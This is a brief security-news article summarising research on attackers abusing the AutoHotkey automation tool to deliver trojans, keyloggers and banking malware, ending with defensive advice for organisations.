SecurityIntelligence researchers have analyzed recent living-off-the-land attacks involving misuse of AutoHotkey, and published a report explaining how organizations can prevent them.
A living-off-the-land attack is an attack that exploits a device’s native tools. Instead of trying to install any other malware or application, attackers just use the tools that are already installed, in order not to tip off security software about their activities.
Several attackers have been known to use living-offs-the-land techniques to infiltrate victims. A threat actor called Gallmaker abused the Microsoft Office Dynamic Data Exchange protocol in 2018 to spy on victims. Other attackers misused the Windows Management Instrumentation Command tool to distribute Astaroth file-less info-stealer.
This time around, attackers misused AutoHotkey. AutoHotkey is an open-source tool that allows Windows users to create hotkeys and macros to automate repetitive tasks in their apps.
The campaign SecurityIntelligence detailed started in mid-May 2021. It used an AutoHotkey-compiled script to deliver a remote access Trojan. The script loaded an executable that deployed different VBScripts and malware payloads including VjW0rm, Houdini, and HCrypt.
This is not the first time attackers misused AutoHotkey.
One of the first known attacks that used AutoHotkey was a credential stealer that was discovered in March 2018. It was disguised as Kaspersky Antivirus and spread via USB devices. Operated by the Fauxpersky threat actor, its keylogger stole sensitive info and distributed malware to other removable media.
In December 2020, a malicious Excel file was discovered that contained a script that could run an AutoHotkey script compiler executable, a malicious AutoHotkey script file, and a VBA AutoOpen macro. The operation collected information about the victims, harvested their credentials, and exfiltrated them to attackers.
Two months later, Cofense detected two phishing emails that targeted Spanish users. Its payloads used a real AutoHotkey compiler executable, a malicious AutoHotkey script, and the Mekotio banking Trojan as a .dll. Mekotio tried to load fake webpages for target banks. It also detected bitcoin addresses and copied them to the clipboard.
SecurityIntelligence researchers conclude by saying that these campaigns highlight the need for employers to implement policies that can prevent attacks using AutoHotkey scripts.
With proper training, the researchers say, an organization‘s employees will be able to avoid falling victims to phishing emails and other attacks. Employers could also identify which apps and tools are indeed necessary for their normal work and disable whichever are not needed.